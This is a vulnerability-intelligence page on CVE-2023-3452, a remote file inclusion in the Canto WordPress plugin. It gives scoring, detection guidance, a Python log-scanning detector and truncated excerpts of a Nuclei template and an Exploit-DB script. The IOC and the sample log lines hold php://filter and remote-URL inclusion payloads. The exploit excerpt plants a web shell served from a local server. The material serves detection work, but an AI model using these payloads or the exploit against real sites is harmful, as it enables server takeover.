CVE-2023-3452
Published: 2023-08-12
Priority: P2 · 72 · critical · CVSS 3.1 base score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 5.62% (92.0th percentile)
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canto | canto | <= 3.0.4 | — |
| flightbycanto | canto | <= 3.0.4 | — |
Detection & IOCs (extracted from sources)
URL IOC: /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html
Detection guidance:
- Detect exploitation attempts by monitoring GET requests to the vulnerable endpoint with a 'wp_abspath' parameter containing a remote URL or PHP stream wrapper (e.g., php://).
- Flag HTTP requests to /wp-content/plugins/canto/includes/lib/download.php with a 'wp_abspath' query parameter as a strong indicator of CVE-2023-3452 exploitation.
- Nuclei detection: check the response body for both base64 strings 'PD9waHAK' and 'V29yZFByZXNz' together with HTTP 200 to confirm successful LFI/RFI exploitation.
- Unauthenticated attackers exploit the 'wp_abspath' parameter; no authentication headers or cookies are required, so any unauthenticated request to the download.php endpoint with this parameter should be alerted on.
- Monitor for outbound HTTP connections from the web server process (e.g., php-fpm, apache) to attacker-controlled hosts, which would indicate successful RFI via allow_url_include.
- Detect version fingerprinting attempts against the Canto plugin by monitoring GET requests to /wp-content/plugins/canto/readme.txt, which precedes exploitation in the Nuclei template.
Context:
- Remote File Inclusion (RFI) exploitation requires the PHP 'allow_url_include' directive to be enabled on the target server. If it is disabled, only Local File Inclusion (LFI) is possible.
- Local File Inclusion is less impactful because it requires the attacker to first upload a malicious PHP file via FTP or another method into a web-readable directory.
- The vulnerability affects Canto plugin versions up to and including 3.0.4; version detection via readme.txt is used by the Nuclei template to gate the exploitation checks.
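The request-side checks from the detection guidance above, applied to access-log lines, as an added example that is not part of this record or of any indexed source. It assumes Apache/nginx combined log format, assumes the three severity tiers and the list of stream-wrapper schemes, and uses constructed sample lines with RFC 5737 documentation addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Apache/nginx combined log format (assumed): ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')
VULN_PATH = "/wp-content/plugins/canto/includes/lib/download.php"
FINGERPRINT_PATH = "/wp-content/plugins/canto/readme.txt"
# Remote schemes usable under allow_url_include plus PHP stream wrappers (assumed list).
SUSPICIOUS_SCHEMES = ("http://", "https://", "ftp://", "php://", "data://", "phar://", "expect://")

def classify(line):
    """Return (severity, reason) for one access-log line, or None when benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    if path.endswith(FINGERPRINT_PATH):
        return ("low", "Canto readme.txt fetched: version fingerprinting often precedes exploitation")
    if not path.endswith(VULN_PATH):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if "wp_abspath" not in params:
        return None
    value = params["wp_abspath"][0].strip().lower()
    if value.startswith(SUSPICIOUS_SCHEMES):
        return ("high", "wp_abspath carries a remote URL or PHP stream wrapper: " + value[:60])
    # The endpoint needs no authentication, so any use of wp_abspath deserves an alert.
    return ("medium", "wp_abspath supplied to download.php")

def scan(lines):
    """Apply classify to many lines; returns [(client_ip, severity, reason), ...]."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((LOG_RE.match(line).group("ip"),) + verdict)
    return hits

# Constructed sample log lines using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2023:10:01:02 +0000] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Aug/2023:10:01:03 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Aug/2023:10:01:04 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http%3A%2F%2F198.51.100.7%2F HTTP/1.1" 200 77 "-" "curl/8.0"',
    '198.51.100.2 - - [12/Aug/2023:10:02:00 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=/var/www/html HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [12/Aug/2023:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, severity, reason in scan(SAMPLE_LOG):
        print(f"[{severity}] {ip}: {reason}")
```

Because the parameter value is percent-decoded before matching, the encoded `http%3A%2F%2F` form is caught the same way as the plain one; the base64 response-body check from the Nuclei template is not reproduced here because access logs do not carry response bodies.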
No detection rules found.
Exploit-DB
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
exploitdb · 2024-02-27 · CVSS 9.8 · [CRITICAL]
Excerpt (truncated as indexed):
```python
def create_admin_file(local_dir, local_shell=None):
    if not os.path.exists(local_dir):
        os.makedirs(local_dir)
    # If a local shell is provided, use it; otherwise, use the default web shell
    if local_shell:
        with open(f"{local_dir}/admin.php", "wb") as admin_file:
            with open(local_shell, "rb") as original_file:
                admin_file.write(original_file.read())
    else:
        with open(f"{local_dir}/admin.php", "w") as admin_file:
            admin_file.write(default_web_shell)

def start_local_server(local_port):
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)
    print(f"Local web server on port {local_port}...")
    httpd.serve_forever()
    return httpd

def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):
    local_dir = "wp
```
Nuclei
WordPress Canto Plugin <= 3.0.4 - File Inclusion
nuclei · CVE-2023-3452 · CVSS 9.8 · [CRITICAL]
The Canto plugin for WordPress up to version 3.0.4 contains a remote file inclusion via the 'wp_abspath' parameter, letting unauthenticated attackers include and execute arbitrary remote code; exploitation requires allow_url_include to be enabled.
Template (truncated as indexed):
```yaml
id: CVE-2023-3452
info:
  name: WordPress Canto Plugin <= 3.0.4 - File Inclusion
  author: omarkurt
  severity: critical
  description: |
    Canto plugin for WordPress up to version 3.0.4 contains a remote file inclusion caused by the 'wp_abspath' parameter, letting unauthenticated attackers include and execute arbitrary remote code if allow_url_include is enabled, exploit requires allow_url_include to be enabled.
  impact: |
    Attackers can execute arbitrary remote code
```
No writeups or analysis indexed.
References:
- https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/tree.php?rev=2841358#L5
- https://plugins.trac.wordpress.org/changeset/2951888/canto/trunk/includes/lib/tree.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/a76077c6-700a-4d21-a930-b0d6455d959c?source=cve
Published: 2023-08-12